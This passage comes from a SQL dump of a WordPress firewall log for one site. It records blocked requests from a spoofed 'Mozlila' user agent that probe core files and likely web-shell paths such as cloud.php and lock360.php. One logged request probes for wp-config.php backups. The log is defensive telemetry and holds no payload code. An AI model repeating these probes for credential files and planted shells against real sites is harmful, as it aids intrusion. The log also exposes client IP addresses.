User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133593,1699888542.174313,1699888542.165600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ms-files.php','http://eckankar-colorado.org/wp-includes/ms-files.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL21zLWZpbGVzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133596,1699888541.127805,1699888541.119000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ms-default-constants.php','http://eckankar-colorado.org/wp-includes/ms-default-constants.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL21zLWRlZmF1bHQtY29uc3RhbnRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133595,1699888541.484008,1699888541.472700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ms-default-filters.php','http://eckankar-colorado.org/wp-includes/ms-default-filters.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL21zLWRlZmF1bHQtZmlsdGVycy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134300,1700049251.981258,1700049251.965600,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/lock360.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2xvY2szNjAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134290,1700045981.357530,1700045981.348400,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134284,1700029153.332367,1700029153.318400,0x00000000000000000000FFFFC39A2963,0,403,0,0,0,'https://eckankar-colorado.org/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134275,1700000754.275973,1700000754.267200,0x00000000000000000000FFFF25DD5C44,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2Nsb3VkLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134269,1700000684.781694,1700000684.759500,0x00000000000000000000FFFF25DD5C44,0,403,0,0,0,'https://eckankar-colorado.org/406.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNi5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133501,1699888577.288355,1699888577.279500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Text/Diff.php','http://eckankar-colorado.org/wp-includes/Text/Diff.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1RleHQvRGlmZi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133500,1699888577.941440,1699888577.932700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Text/Diff/Renderer/inline.php','http://eckankar-colorado.org/wp-includes/Text/Diff/Renderer/inline.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1RleHQvRGlmZi9SZW5kZXJlci9pbmxpbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133502,1699888576.635815,1699888576.620900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/gzdecode.php','http://eckankar-colorado.org/wp-includes/SimplePie/gzdecode.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9nemRlY29kZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134271,1700000719.224959,1700000719.216300,0x00000000000000000000FFFF25DD5C44,0,403,0,0,0,'https://eckankar-colorado.org/img/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltZy9jbG91ZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134268,1700000688.362204,1700000688.347200,0x00000000000000000000FFFF25DD5C44,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/network/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsvY2xvdWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134259,1699998178.396030,1699998178.374100,0x00000000000000000000FFFF5B5CFC8E,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133499,1699888578.272667,1699888578.263300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/blocks/','http://eckankar-colorado.org/wp-includes/blocks/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2Nrcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134270,1700000723.951750,1700000723.943100,0x00000000000000000000FFFF25DD5C44,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/css/colors/coffee/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nzcy9jb2xvcnMvY29mZmVlL2Nsb3VkLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133080,1699788222.664034,1699788222.660600,0x00000000000000000000FFFF92BE7918,0,200,0,0,0,'https://eckankar-colorado.org/wp-config.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','logged:waf','wp-config.php back-up probing','{\"learningMode\":0,\"failedRules\":\"logged|501\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbmZpZy5waHA=\",\"path\":\"L3dwLWNvbmZpZy5waHA=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(133613,1699888534.666316,1699888534.657700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/functions.php','http://eckankar-colorado.org/wp-includes/functions.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Z1bmN0aW9ucy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133143,1699888496.952837,1699888496.943500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-customize-widgets.php','http://eckankar-colorado.org/wp-includes/class-wp-customize-widgets.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWN1c3RvbWl6ZS13aWRnZXRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133106,1699825269.322044,1699825269.307600,0x00000000000000000000FFFF2E142EC6,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/user/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIvd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133223,1699888687.132200,1699888687.123400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/zaen/includes/','http://eckankar-colorado.org/wp-content/plugins/zaen/includes/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy96YWVuL2luY2x1ZGVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133199,1699888476.448745,1699888476.440200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-editor.php','http://eckankar-colorado.org/wp-includes/block-editor.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLWVkaXRvci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133165,1699888488.585165,1699888488.575600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-block-editor-context.php','http://eckankar-colorado.org/wp-includes/class-wp-block-editor-context.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWJsb2NrLWVkaXRvci1jb250ZXh0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133183,1699888482.243181,1699888482.233800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-json.php','http://eckankar-colorado.org/wp-includes/class-json.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLWpzb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133182,1699888482.588901,1699888482.580200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-oembed.php','http://eckankar-colorado.org/wp-includes/class-oembed.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLW9lbWJlZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133190,1699888479.618835,1699888479.610000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/canonical.php','http://eckankar-colorado.org/wp-includes/canonical.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Nhbm9uaWNhbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133191,1699888479.288987,1699888479.280400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/cache.php','http://eckankar-colorado.org/wp-includes/cache.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 